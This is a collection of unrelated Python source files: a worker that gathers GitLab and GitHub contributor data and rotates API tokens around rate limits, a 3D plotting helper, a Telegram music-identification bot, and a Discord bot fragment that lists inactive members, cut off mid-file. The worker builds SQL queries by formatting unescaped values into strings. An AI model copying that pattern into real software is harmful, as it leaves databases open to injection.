contributors = self.paginate("https://gitlab.com/api/v4/projects/" + url_encoded_format + "/repository/contributors?per_page=100&page={}", duplicate_col_map, update_col_map, table, table_pkey, platform='gitlab')
for repo_contributor in contributors:
try:
cntrb_compressed_url = ("https://gitlab.com/api/v4/users?search=" + repo_contributor['email'])
self.logger.info("Hitting endpoint: " + cntrb_compressed_url + " ...\n")
r = requests.get(url=cntrb_compressed_url, headers=self.headers)
contributor_compressed = r.json()
email = repo_contributor['email']
self.logger.info(contributor_compressed)
if len(contributor_compressed) == 0 or type(contributor_compressed) is dict or "id" not in contributor_compressed[0]:
continue
self.logger.info("Fetching for user: " + str(contributor_compressed[0]["id"]))
cntrb_url = ("https://gitlab.com/api/v4/users/" + str(contributor_compressed[0]["id"]))
self.logger.info("Hitting end point to get complete contributor info now: " + cntrb_url + "...\n")
r = requests.get(url=cntrb_url, headers=self.headers)
contributor = r.json()
cntrb = {
"cntrb_login": contributor.get('username', None),
"cntrb_created_at": contributor.get('created_at', None),
"cntrb_email": email,
"cntrb_company": contributor.get('organization', None),
"cntrb_location": contributor.get('location', None),
# "cntrb_type": , dont have a use for this as of now ... let it default to null
"cntrb_canonical": contributor.get('public_email', None),
"gh_user_id": contributor.get('id', None),
"gh_login": contributor.get('username', None),
"gh_url": contributor.get('web_url', None),
"gh_html_url": contributor.get('web_url', None),
"gh_node_id": None,
"gh_avatar_url": contributor.get('avatar_url', None),
"gh_gravatar_id": None,
"gh_followers_url": None,
"gh_following_url": None,
"gh_gists_url": None,
"gh_starred_url": None,
"gh_subscriptions_url": None,
"gh_organizations_url": None,
"gh_repos_url": None,
"gh_events_url": None,
"gh_received_events_url": None,
"gh_type": None,
"gh_site_admin": None,
"tool_source": self.tool_source,
"tool_version": self.tool_version,
"data_source": self.data_source
}
# Commit insertion to table
if repo_contributor['flag'] == 'need_update':
result = self.db.execute(self.contributors_table.update().where(
self.worker_history_table.c.cntrb_email == email).values(cntrb))
self.logger.info("Updated tuple in the contributors table with existing email: {}".format(email))
self.cntrb_id_inc = repo_contributor['pkey']
elif repo_contributor['flag'] == 'need_insertion':
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: {}".format(result.inserted_primary_key))
self.results_counter += 1
self.logger.info("Inserted contributor: " + contributor['username'] + "\n")
# Increment our global track of the cntrb id for the possibility of it being used as a FK
self.cntrb_id_inc = int(result.inserted_primary_key[0])
except Exception as e:
self.logger.info("Caught exception: {}".format(e))
self.logger.info("Cascading Contributor Anomalie from missing repo contributor data: {} ...\n".format(cntrb_url))
continue
def record_model_process(self, repo_id, model):
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": model,
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Stopped",
"total_results": self.results_counter
}
if self.finishing_task:
result = self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.history_id += 1
else:
result = self.helper_db.execute(self.worker_history_table.insert().values(task_history))
self.logger.info("Record incomplete history tuple: {}\n".format(result.inserted_primary_key))
self.history_id = int(result.inserted_primary_key[0])
self.collection_start_time = time.time()
def register_task_completion(self, task, repo_id, model):
self.logger.info(f"Worker completed this task in {self.collection_start_time - time.time()} seconds.\n")
# Task to send back to broker
task_completed = {
'worker_id': self.config['id'],
'job_type': "MAINTAIN",
'repo_id': repo_id,
'job_model': model
}
key = 'github_url' if 'github_url' in task['given'] else 'git_url' if 'git_url' in task['given'] else \
'gitlab_url' if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
task_completed[key] = task['given']['github_url'] if 'github_url' in task['given'] else task['given']['git_url'] \
if 'git_url' in task['given'] else task['given']['gitlab_url'] if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
if key == 'INVALID_GIVEN':
self.register_task_failure(task, repo_id, "INVALID_GIVEN: Not a github/gitlab/git url.")
return
# Add to history table
task_history = {
'repo_id': repo_id,
'worker': self.config['id'],
'job_model': model,
'oauth_id': self.oauths[0]['oauth_id'],
'timestamp': datetime.datetime.now(),
'status': "Success",
'total_results': self.results_counter
}
self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.logger.info(f"Recorded job completion for: {task_completed}\n")
# Update job process table
updated_job = {
'since_id_str': repo_id,
'last_count': self.results_counter,
'last_run': datetime.datetime.now(),
'analysis_state': 0
}
self.helper_db.execute(self.worker_job_table.update().where(
self.worker_job_table.c.job_model==model).values(updated_job))
self.logger.info(f"Updated job process for model: {model}\n")
if self.config['offline_mode'] is False:
# Notify broker of completion
self.logger.info(f"Telling broker we completed task: {task_completed}\n")
self.logger.info(f"This task inserted: {self.results_counter + self.insert_counter} tuples " +
f"and updated {self.update_counter} tuples.\n")
requests.post('http://{}:{}/api/unstable/completed_task'.format(
self.config['host_broker'],self.config['port_broker']), json=task_completed)
# Reset results counter for next task
self.results_counter = 0
self.insert_counter = 0
self.update_counter = 0
def register_task_failure(self, task, repo_id, e):
self.logger.error(f"Worker ran into an error for task: {task}")
self.logger.error(
f"Worker was processing this task for {self.collection_start_time - time.time()} "
"seconds."
)
self.logger.error("Printing traceback...")
self.logger.error(e)
tb = traceback.format_exc()
self.logger.error(tb)
self.logger.info(f"This task inserted {self.results_counter} tuples before failure.")
self.logger.info("Notifying broker and logging task failure in database...")
key = (
'github_url' if 'github_url' in task['given'] else 'git_url'
if 'git_url' in task['given'] else 'gitlab_url'
if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
)
url = task['given'][key]
""" Query all repos with repo url of given task """
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(url))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
task['worker_id'] = self.config['id']
try:
requests.post("http://{}:{}/api/unstable/task_error".format(
self.config['host_broker'],self.config['port_broker']), json=task)
except requests.exceptions.ConnectionError:
self.logger.error("Could not send task failure message to the broker:")
self.logger.error(e)
except Exception:
self.logger.error("An error occured while informing broker about task failure:")
self.logger.error(e)
# Add to history table
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": task['models'][0],
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Error",
"total_results": self.results_counter
}
self.helper_db.execute(
self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id
).values(task_history)
)
self.logger.error(f"Recorded job error in the history table for: {task}")
# Update job process table
updated_job = {
"since_id_str": repo_id,
"last_count": self.results_counter,
"last_run": datetime.datetime.now(),
"analysis_state": 0
}
self.helper_db.execute(
self.worker_job_table.update().where(
self.worker_job_table.c.job_model==task['models'][0]
).values(updated_job)
)
self.logger.info(f"Updated job process for model: {task['models'][0]}\n")
# Reset results counter for next task
self.results_counter = 0
def get_relevant_columns(self, table, action_map={}):
columns = copy.deepcopy(action_map['update']['augur']) if 'update' in action_map else []
columns += action_map['value_update']['augur'] if 'value_update' in action_map else []
columns += action_map['insert']['augur'] if 'insert' in action_map else []
return [table.c[column] for column in
columns + [list(table.primary_key)[0].name]]
def retrieve_tuple(self, key_values, tables):
table_str = tables[0]
del tables[0]
key_values_items = list(key_values.items())
for col, value in [key_values_items[0]]:
where_str = col + " = '" + value + "'"
del key_values_items[0]
for col, value in key_values_items:
where_str += ' AND ' + col + " = '" + value + "'"
for table in tables:
table_str += ", " + table
retrieveTupleSQL = s.sql.text("""
SELECT * FROM {} WHERE {}
""".format(table_str, where_str))
values = json.loads(
pd.read_sql(retrieveTupleSQL, self.db, params={}).to_json(orient="records")
)
return values
def update_gitlab_rate_limit(self, response, bad_credentials=False, temporarily_disable=False):
# Try to get rate limit from request headers, sometimes it does not work (GH's issue)
# In that case we just decrement from last recieved header count
if bad_credentials and len(self.oauths) > 1:
self.logger.info(
f"Removing oauth with bad credentials from consideration: {self.oauths[0]}"
)
del self.oauths[0]
if temporarily_disable:
self.logger.info("Gitlab rate limit reached. Temp. disabling...")
self.oauths[0]['rate_limit'] = 0
else:
try:
self.oauths[0]['rate_limit'] = int(response.headers['RateLimit-Remaining'])
except:
self.oauths[0]['rate_limit'] -= 1
self.logger.info("Updated rate limit, you have: " +
str(self.oauths[0]['rate_limit']) + " requests remaining.")
if self.oauths[0]['rate_limit'] <= 0:
try:
reset_time = response.headers['RateLimit-Reset']
except Exception as e:
self.logger.info(f"Could not get reset time from headers because of error: {e}")
reset_time = 3600
time_diff = datetime.datetime.fromtimestamp(int(reset_time)) - datetime.datetime.now()
self.logger.info("Rate limit exceeded, checking for other available keys to use.")
# We will be finding oauth with the highest rate limit left out of our list of oauths
new_oauth = self.oauths[0]
# Endpoint to hit solely to retrieve rate limit information from headers of the response
url = "https://gitlab.com/api/v4/version"
other_oauths = self.oauths[0:] if len(self.oauths) > 1 else []
for oauth in other_oauths:
# self.logger.info("Inspecting rate limit info for oauth: {}\n".format(oauth))
self.headers = {"PRIVATE-TOKEN" : oauth['access_token']}
response = requests.get(url=url, headers=self.headers)
oauth['rate_limit'] = int(response.headers['RateLimit-Remaining'])
oauth['seconds_to_reset'] = (
datetime.datetime.fromtimestamp(
int(response.headers['RateLimit-Reset'])
) - datetime.datetime.now()
).total_seconds()
# Update oauth to switch to if a higher limit is found
if oauth['rate_limit'] > new_oauth['rate_limit']:
self.logger.info(f"Higher rate limit found in oauth: {oauth}")
new_oauth = oauth
elif (
oauth['rate_limit'] == new_oauth['rate_limit']
and oauth['seconds_to_reset'] < new_oauth['seconds_to_reset']
):
self.logger.info(
f"Lower wait time found in oauth with same rate limit: {oauth}"
)
new_oauth = oauth
if new_oauth['rate_limit'] <= 0 and new_oauth['seconds_to_reset'] > 0:
self.logger.info(
"No oauths with >0 rate limit were found, waiting for oauth with "
f"smallest wait time: {new_oauth}\n"
)
time.sleep(new_oauth['seconds_to_reset'])
# Make new oauth the 0th element in self.oauths so we know which one is in use
index = self.oauths.index(new_oauth)
self.oauths[0], self.oauths[index] = self.oauths[index], self.oauths[0]
self.logger.info("Using oauth: {}\n".format(self.oauths[0]))
# Change headers to be using the new oauth's key
self.headers = {"PRIVATE-TOKEN" : self.oauths[0]['access_token']}
def update_gh_rate_limit(self, response, bad_credentials=False, temporarily_disable=False):
# Try to get rate limit from request headers, sometimes it does not work (GH's issue)
# In that case we just decrement from last recieved header count
if bad_credentials and len(self.oauths) > 1:
self.logger.warning(
f"Removing oauth with bad credentials from consideration: {self.oauths[0]}"
)
del self.oauths[0]
if temporarily_disable:
self.logger.debug(
"Github thinks we are abusing their api. Preventing use "
"of this key until its rate limit resets..."
)
self.oauths[0]['rate_limit'] = 0
else:
try:
self.oauths[0]['rate_limit'] = int(response.headers['X-RateLimit-Remaining'])
# self.logger.info("Recieved rate limit from headers\n")
except:
self.oauths[0]['rate_limit'] -= 1
self.logger.info("Headers did not work, had to decrement")
self.logger.info(
f"Updated rate limit, you have: {self.oauths[0]['rate_limit']} requests remaining."
)
if self.oauths[0]['rate_limit'] <= 0:
try:
reset_time = response.headers['X-RateLimit-Reset']
except Exception as e:
self.logger.error(f"Could not get reset time from headers because of error: {e}")
reset_time = 3600
time_diff = datetime.datetime.fromtimestamp(int(reset_time)) - datetime.datetime.now()
self.logger.info("Rate limit exceeded, checking for other available keys to use.")
# We will be finding oauth with the highest rate limit left out of our list of oauths
new_oauth = self.oauths[0]
# Endpoint to hit solely to retrieve rate limit information from headers of the response
url = "https://api.github.com/users/gabe-heim"
other_oauths = self.oauths[0:] if len(self.oauths) > 1 else []
for oauth in other_oauths:
# self.logger.info("Inspecting rate limit info for oauth: {}\n".format(oauth))
self.headers = {'Authorization': 'token %s' % oauth['access_token']}
attempts = 3
success = False
while attempts > 0 and not success:
response = requests.get(url=url, headers=self.headers)
try:
oauth['rate_limit'] = int(response.headers['X-RateLimit-Remaining'])
oauth['seconds_to_reset'] = (
datetime.datetime.fromtimestamp(
int(response.headers['X-RateLimit-Reset'])
) - datetime.datetime.now()
).total_seconds()
success = True
except Exception as e:
self.logger.info(
f"oath method ran into error getting info from headers: {e}\n"
)
self.logger.info(f"{self.headers}\n{url}\n")
attempts -= 1
if not success:
continue
# Update oauth to switch to if a higher limit is found
if oauth['rate_limit'] > new_oauth['rate_limit']:
self.logger.info("Higher rate limit found in oauth: {}\n".format(oauth))
new_oauth = oauth
elif (
oauth['rate_limit'] == new_oauth['rate_limit']
and oauth['seconds_to_reset'] < new_oauth['seconds_to_reset']
):
self.logger.info(
f"Lower wait time found in oauth with same rate limit: {oauth}\n"
)
new_oauth = oauth
if new_oauth['rate_limit'] <= 0 and new_oauth['seconds_to_reset'] > 0:
self.logger.info(
"No oauths with >0 rate limit were found, waiting for oauth with "
f"smallest wait time: {new_oauth}\n"
)
time.sleep(new_oauth['seconds_to_reset'])
# Make new oauth the 0th element in self.oauths so we know which one is in use
index = self.oauths.index(new_oauth)
self.oauths[0], self.oauths[index] = self.oauths[index], self.oauths[0]
self.logger.info("Using oauth: {}\n".format(self.oauths[0]))
# Change headers to be using the new oauth's key
self.headers = {'Authorization': 'token %s' % self.oauths[0]['access_token']}
def update_rate_limit(
self, response, bad_credentials=False, temporarily_disable=False, platform="gitlab"
):
if platform == 'gitlab':
return self.update_gitlab_rate_limit(
response, bad_credentials=bad_credentials, temporarily_disable=temporarily_disable
)
elif platform == 'github':
return self.update_gh_rate_limit(
response, bad_credentials=bad_credentials, temporarily_disable=temporarily_disable
)
|
plot.py
|
#
# Copyright (c) 2018, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# abstract plot support
#
import sys, time, threading, json, queue
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import art3d
# ------------------------------------------------
class Line(art3d.Line3D): # a line in 3D space
def __init__(self, from_xyz=(0, 0, 0), to_xyz=(1, 1, 1), *args, **kwargs):
xs, ys, zs = tuple(zip(from_xyz, to_xyz))
art3d.Line3D.__init__(self, xs, ys, zs, *args, **kwargs)
def location(self, from_, to_, *args):
xs, ys, zs = tuple(zip(from_, to_))
self.set_xdata(xs)
self.set_ydata(ys)
self.set_3d_properties(zs)
class Point(Line): # a point (a very short line) in 3D space
def __init__(self, xyz=(0, 0, 0), color='black', marker='.', size=1, vanish=1.0):
Line.__init__(self, xyz, xyz,
color=color, marker=marker, markersize=size,
markeredgewidth=1, linestyle='', fillstyle='none', alpha=1.0)
if vanish is not None:
tt = threading.Thread(target=self.__fadeout, args=(0.1 * vanish, 0.1))
tt.daemon = True
tt.start()
def __fadeout(self, period, delta):
def delay():
t = time.time()
c = 0
while True:
c += 1
yield max(t + c * period - time.time(), 0)
tick = delay()
while True:
time.sleep(next(tick))
na = self.get_alpha() - delta
if na <= 0:
self.remove()
break
self.set_alpha(na)
def location(self, at_, *args):
Line.location(self, at_, at_)
# ------------------------------------------------
def set_aspect_equal_3d(ax): # axis have to be equal
xlim = ax.get_xlim3d()
ylim = ax.get_ylim3d()
zlim = ax.get_zlim3d()
xmean = np.mean(xlim)
ymean = np.mean(ylim)
zmean = np.mean(zlim)
plot_radius = max([abs(lim - mean_) for lims, mean_ in ((xlim, xmean), (ylim, ymean), (zlim, zmean)) for lim in lims])
ax.set_xlim3d([xmean - plot_radius, xmean + plot_radius])
ax.set_ylim3d([ymean - plot_radius, ymean + plot_radius])
ax.set_zlim3d([zmean - plot_radius, zmean + plot_radius])
def move_figure(fig, xy):
backend = mpl.get_backend()
if backend == 'TkAgg':
fig.canvas.manager.window.wm_geometry("+%d+%d" % xy)
elif backend == 'WXAgg':
fig.canvas.manager.window.SetPosition(xy)
else: # QT and GTK
fig.canvas.manager.window.move(*xy)
# ------------------------------------------------
def update_data(q):
while q.alive:
line = sys.stdin.readline()
try:
temp = json.loads(line)
q.put(temp)
except:
pass
def update_plot(fig, q, func):
clk, cnt = 0, 0
while q.alive:
if not q.empty():
while q.qsize() > 0: item = q.get()
clk, cnt = item['header']['time'], item['header']['number']
func(item)
q.fps[q.cnt % len(q.fps)] = time.time() % 1000000
q.cnt += 1
m = (max(q.fps) - min(q.fps)) / len(q.fps)
try:
fig.canvas.draw_idle()
fig.canvas.set_window_title(
'time: {} | count: {} | wait: {} | fps: {} | cycles: {:010} '.format(
'{:.3f}'.format(time.time())[-7:],
cnt,
q.qsize(),
int(1.0 / m),
clk))
time.sleep(1e-6)
except:
q.alive = False
def start_plot(fig, ax, func):
plt.show(block=False)
q = queue.Queue()
q.alive = True
q.cnt, q.fps = 0, [time.time(),] * 10
threading.Thread(target=update_plot, args=(fig, q, func)).start()
tu = threading.Thread(target=update_data, args=(q, ))
tu.daemon = True
tu.start()
plt.show(block=True)
q.alive = False
|
SongID.py
|
print(' _ _ ---==== Music Finder ====--- _ _\n')
from SongIDProcessor import SIDProcessor
from SongIDCore import *
from telegram import ParseMode
from telegram.utils.helpers import mention_html
import sys, traceback
from threading import Thread
import urllib.request # Check for internet connectivity
os.system(f'title _ _ ---==== Music Finder {ver} ====--- _ _') # Set the windows console window title
while True:
try:
ACR_PING_CODE = urllib.request.urlopen("https://identify-eu-west-1.acrcloud.com").getcode()
if ACR_PING_CODE == 200:
logger.info('ACR Cloud pinged successfully!')
break
else:
logger.warning('ACR Cloud ping error code: '+str(ACR_PING_CODE)+', retrying in 20 seconds')
time.sleep(20)
except:
logger.warning('Unable to ping ACR Cloud, retrying in 10 seconds')
time.sleep(10)
# Function from the telegram-bot-api wiki:
# https://github.com/python-telegram-bot/python-telegram-bot/wiki/Code-snippets#an-good-error-handler
def error(update, context):
# we want to notify the user of this problem. This will always work, but not notify users if the update is an
# callback or inline query, or a poll update. In case you want this, keep in mind that sending the message
# could fail
try:
raise context.error
except telegram.error.Unauthorized as e:
logging.error(f'Unauthorized: {e}')
# remove update.message.chat_id from conversation list
except telegram.error.BadRequest as e:
logging.error(f'BadRequest: {e}')
# handle malformed requests - read more below!
except telegram.error.TimedOut as e:
logging.error(f'TimedOut: {e}')
# handle slow connection problems
except telegram.error.NetworkError as e:
logging.error(f'NetworkError: {e}')
# handle other connection problems
except telegram.error.ChatMigrated as e:
logging.error(f'ChatMigrated: {e}')
# the chat_id of a group has changed, use e.new_chat_id instead
except telegram.error.TelegramError as e:
logging.error(f'Telegram Error: {e}')
# handle all other telegram related errors
if 'An existing connection was forcibly closed by the remote host' in str(context.error):
#update.effective_message.reply_text('⚠️ Telegram closed the connection. Please try again.')
#logbot(update, '⚠️ Telegram closed the connection. Please try again.')
logger.info('existing connection closed (error exception catch temp code), pass')
pass
elif '[WinError 32] The process cannot access the file because it is being used by another process' in str(context.error):
logger.info('File cannot be accessed (likely deleted), being used by another process, pass')
pass
else:
if update != None:
text = "⚠️ An error occured, sorry for any inconvenience caused.\nThe developer has been notified and will look into this issue as soon as possible."
update.effective_message.reply_text(text)
# This traceback is created with accessing the traceback object from the sys.exc_info, which is returned as the
# third value of the returned tuple. Then we use the traceback.format_tb to get the traceback as a string, which
# for a weird reason separates the line breaks in a list, but keeps the linebreaks itself. So just joining an
# empty string works fine.
trace = "".join(traceback.format_tb(sys.exc_info()[2]))
# lets try to get as much information from the telegram update as possible
payload = ""
# normally, we always have an user. If not, its either a channel or a poll update.
if update.effective_user:
payload += f' with the user {mention_html(update.effective_user.id, update.effective_user.first_name)}'
# there are more situations when you don't get a chat
if update.effective_chat:
payload += f' within the chat <i>{update.effective_chat.title}</i>'
if update.effective_chat.username:
payload += f' (@{update.effective_chat.username})'
# but only one where you have an empty payload by now: A poll (buuuh)
if update.poll:
payload += f' with the poll id {update.poll.id}.'
# lets put this in a "well" formatted text
text = f"⚠️ Uncaught error\n\nThe error <code>{context.error}</code> occured{payload}. The full traceback:\n\n<code>{trace}" \
f"</code>"
# and send it to the dev
context.bot.send_message(devid, text, parse_mode=ParseMode.HTML)
# we raise the error again, so the logger module catches it. If you don't use the logger module, use it.
raise
def stop_and_restart():
# Gracefully stop the Updater and replace the current process with a new one
u.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
# Respond when the developer sends the '/r' command
def restart(update, context):
update.message.reply_text(f'{botName} is restarting...')
Thread(target=stop_and_restart).start()
# Send a message to a specific user
def sendMsg(update, context):
logusr(update)
processed = SIDProcessor.commandArgs(update, context)
if processed == None:
logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
helpCMD(update, context)
elif processed[0] == 'too_long':
logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
else:
user = processed[0]
message = processed[1]
if user[0] == '@':
user = SIDProcessor.find_key(userdata, user[1:])[0]
context.bot.send_message(int(user), message, parse_mode=telegram.ParseMode.HTML)
logbotsend(update, context, 'Message sent!')
# Respond when the user sends the '/start' command
# (When the user adds a telegram bot, they are forced to send '/start')
def startCMD(update, context):
logusr(update)
userID=str(update.effective_chat.id)
username=str(update.effective_chat.username)
if userID not in userdata:
SIDProcessor.addUserData(update, '0', '0')
botsend(update, context, f'''<b>{botName}</b> is a Telegram bot that can identify music, similar to Shazam
Key Features:
- Scan for music in <b>videos</b>
- Scan for music playing around you with <b>Telegram Audio Message</b>
- Direct links to services such as <b>Youtube</b>, <b>Spotify</b> and <b>Deezer</b>
<i>[20MB file size limit]</i>
To get started, upload a file or record a Telegram Audio Message
Support: @DarkPentester''')
devsend(update, context, '\'{update.message.text}\'')
logbot(update, '*Sent \'/start\' response*')
def limitCMD(update, context):
logusr(update)
botsend(update, context, '''Running bot isn't free, and to keep costs low, we limit our daily API requests (comparing your audio to a third party music fingerprint database).
Unfortunately, we've hit that limit today, and we're sorry for any inconvenience in being unable to process your request.
Please try again tomorrow.
In the meantime, you could try using other music identification services such as "Shazam" and "Sound Hound". Unfortunately these services don't support sending videos or audio files and can only identify music with your microphone.
''')
devsend(update, context, '\'{update.message.text}\'')
logbot(update, '*Sent \'/limit\' response*')
# Respond when the user sends an unknown command
def unknownCMD(update, context):
devsend(update, context, '\'{update.message.text}\'')
logusr(update)
logbotsend(update, context, "Sorry, I didn't understand that command.")
# Send user information on how to use the bot when they send '/help'
def helpCMD(update, context):
logusr(update)
botsend(update, context, f'''--= How to use {botName} =--
1. Send me a file: I will scan the file for music
---> You can send me an audio/video file on your device by pressing the paperclip icon in the bottom left
---> Record a Telegram audio message with the microphone icon in the bottom right and capture music playing around you.
File size limit: 20MB
If you exceed this limit, we won't be able to scan your file for music!''')
devsend(update, context, '\'{update.message.text}\'')
logbot(update, '*Sent help information*')
# Notify the user that their uploaded file isn't supported
def invalidFiletype(update, context):
logusr(update)
botsend(update, context, 'Sorry, we don\'t scan those types of files.\nPlease upload an <b>audio</b> or <b>video</b> file containing the music you wish to scan, or <b>record/hum</b> a <b>Telegram Voice Message</b>.\n\n<i>20MB file size limit</i>')
context.bot.send_message(devid, f'User @{update.effective_user.username} ({update.effective_chat.id}) sent an invalid filetype')
logbot(update, '*Sent invalid-filetype response*')
# Send the user the data we have saved on them when they send '/mydata'
def mydataCMD(update, context):
logusr(update)
data=SIDProcessor.getUserData(update)
user = update.effective_chat.id
username = data["username"]
name = data["name"].replace(' None', '')
api_calls = data["api_calls"]
last_call = round(int(time.time()) - int(data["last_call"]))
lc=SIDProcessor.getUserData(update)['last_call']
botsend(update, context, f'''Here is the data we have stored about you:
<b>User ID</b>: {user}
<b>Username</b>: @{username}
<b>Full Name</b>: {name}
<b>API Calls</b>: {api_calls}
<b>Last API Call</b>: {last_call} seconds ago
<i>We do not store more data than we need to, and we delete your uploaded audio files as soon as we've finished processing them</i>
''')
devsend(update, context, '\'{update.message.text}\'')
logbot(update, '*Sent user data*')
# Respond to the user entering a command when in debug mode
def maintenanceINFO(update, context):
logusr(update)
context.bot.send_message(devid, f'User @{update.effective_user.username} ({update.effective_chat.id}) [MAINTENANCE MODE]: \'{update.message.text}\'')
logbotsend(update, context, 'We\'re currently under maintenance, please try again later')
def noisyProcess(update, context):
SIDProcessor.fileProcess(update, context, 'noisy')
# Currently not in use
def clearProcess(update, context):
SIDProcessor.fileProcess(update, context, 'clear')
def humProcess(update, context):
SIDProcessor.fileProcess(update, context, 'hum')
maintenance = 0
dp.add_error_handler(error) # Handle uncaught exceptions
if maintenance == 1:
logger.info('- - - - MAINTENANCE MODE ENABLED - - - -')
dp.add_handler(CommandHandler('start', startCMD)) # Respond to '/start'
dp.add_handler(CommandHandler('mydata', mydataCMD, filters=Filters.user(username=devusername))) # Respond to '/mydata'
dp.add_handler(CommandHandler('help', helpCMD, filters=Filters.user(username=devusername))) # Respond to '/help'
dp.add_handler(CommandHandler('limit', limitCMD, filters=Filters.user(username=devusername))) # Respond to '/limit'
# Handle different types of file uploads
dp.add_handler(MessageHandler(Filters.audio & Filters.user(username=devusername), noisyProcess))
dp.add_handler(MessageHandler(Filters.video & Filters.user(username=devusername), noisyProcess))
dp.add_handler(MessageHandler(Filters.voice & Filters.user(username=devusername), humProcess))
dp.add_handler(MessageHandler(Filters.photo & Filters.user(username=devusername), invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(MessageHandler(Filters.document & Filters.user(username=devusername), invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername))) # Allow the developer to restart the bot
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername))) # Allow the developer to send messages to users
dp.add_handler(MessageHandler(Filters.command, unknownCMD)) # Notify user of invalid command
#dp.add_handler(MessageHandler(Filters.text & Filters.user(username=devusername), helpCMD)) # Respond to '/help'
dp.add_handler(MessageHandler(Filters.text, maintenanceINFO)) # Respond to text
elif maintenance == 0:
dp.add_handler(CommandHandler('start', startCMD)) # Respond to '/start'
dp.add_handler(CommandHandler('mydata', mydataCMD)) # Respond to '/mydata'
dp.add_handler(CommandHandler('help', helpCMD)) # Respond to '/help'
dp.add_handler(CommandHandler('limit', limitCMD)) # Respond to '/limit'
# Handle different types of file uploads
dp.add_handler(MessageHandler(Filters.audio, noisyProcess))
dp.add_handler(MessageHandler(Filters.video, noisyProcess))
dp.add_handler(MessageHandler(Filters.voice, humProcess))
dp.add_handler(MessageHandler(Filters.photo, invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(MessageHandler(Filters.document, invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername))) # Allow the developer to restart the bot
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername))) # Allow the developer to send messages to users
dp.add_handler(MessageHandler(Filters.command, unknownCMD)) # Notify user of invalid command
dp.add_handler(MessageHandler(Filters.text, helpCMD)) # Respond to text
logger.info('Loaded: Handlers')
logger.info('Loading Complete!')
if heroku_enabled == 'True':
logger.info('Initialising Heroku webhook...')
PORT = int(os.environ.get('PORT', int(heroku_port)))
u.start_webhook(listen=heroku_listen,
port=int(PORT),
url_path=token)
u.bot.setWebhook(heroku_webhook + token)
logger.info('Heroku webhook initialised')
else:
u.start_polling()
logger.info('Standard polling initialised')
u.idle()
|
cleanser.py
|
# https://discordapp.com/oauth2/authorize?client_id=703918313880944705&scope=bot&permissions=8
import discord, asyncio, time, datetime, threading, timeago, pytz, os
from flask import Flask, render_template, request
from hashlib import sha256
from subprocess import check_output
TOKEN = "no, go away"
GUILD = 649119550633410611
# runs synced in main thread
client = discord.Client()
# runs asynced in separate thread
app = Flask(__name__)
# dict of active users to datetime of last seen message, will be accessed across threads (thread safe: only the main thread will write to it)
# do not use this as an alone criteria! whitelist people who have elevated permissions, bots, etc..
active = {}
commands = {} # command: function(message) declared in "if __name__" thing
def findUnclean(guild):
# remember to update the "active" list by doing the bot command in the chat!
unclean = []
for member in guild.members:
if len(member.roles) == 1 and member not in active: # '@everyone' role is distributed to everyone
unclean.append(member)
return unclean
async def updateActive(days=5):
# takes ~5s in hypixel central with days=5
active.clear()
# activity must be recorded after this point
after = datetime.datetime.now() - datetime.timedelta(days=days)
for channel in client.get_guild(GUILD).text_channels:
async for m in channel.history(after=after, oldest_first=True):
if m.author in active and (m.created_at - active[m.author]).total_seconds() > 0: # if m is the latest message
active[m.author] = m.created_at
elif m.author not in active:
active[m.author] = m.created_at
def htmlTable(members):
members = [{
"name": user.name,
"nick": user.nick if user.nick else "",
"mention": user.mention,
"joined": timeago.format(user.joined_at),
"age": timeago.format(user.created_at)
} for user in members]
return render_template("index.html", users=members)
def personalizedEmbed(member):
def statusString(status):
return "Online" if status == discord.Status.online else \
"Offline" if status == discord.Status.offline else \
"Idle" if status == discord.Status.idle else \
"Do not disturb" if status == discord.Status.dnd else \
status
u = member
data = {
"Generic": {
"Name": str(u),
"Display Name": u.display_name,
"Mention": u.mention,
"ID": u.id,
"Animated Avatar": str(u.is_avatar_animated()),
"Robot": str(u.bot)
},
"Age": {
"Joined at": str(u.joined_at),
"Joined server": timeago.format(u.joined_at),
"Created at": str(u.created_at),
"Created": timeago.format(u.created_at)
},
"Temporary data": {
"Last Nitro Boost": str(u.premium_since) if u.premium_since else "",
"Activity": f"{u.activity}" if u.activity else "",
"Voice State": str(u.voice),
"Top Role": str(u.top_role),
"Roles": ", ".join([f"{r} ({timeago.format(r.created_at)})" for r in u.roles]).replace("@everyone ", "everyone ")
},
"Status": {
"Status": statusString(u.status),
"Desktop Status": statusString(u.desktop_status),
"Mobile Status": statusString(u.mobile_status),
"Web Status": statusString(u.web_status),
"Currently Mobile": str(u.is_on_mobile())
}
}
embed = discord.Embed(
title=f"{u.name} ({u.nick})" if u.nick is not None else u.name,
type="rich",
color=discord.Color.from_rgb(0, 139, 139)
)
embed.set_image(url=u.avatar_url)
for catName, cat in data.items():
embed.add_field(name=catName, value="\n".join([f"{k}: {v}" for k, v in cat.items()]), inline=False)
return embed
def sherlock(un):
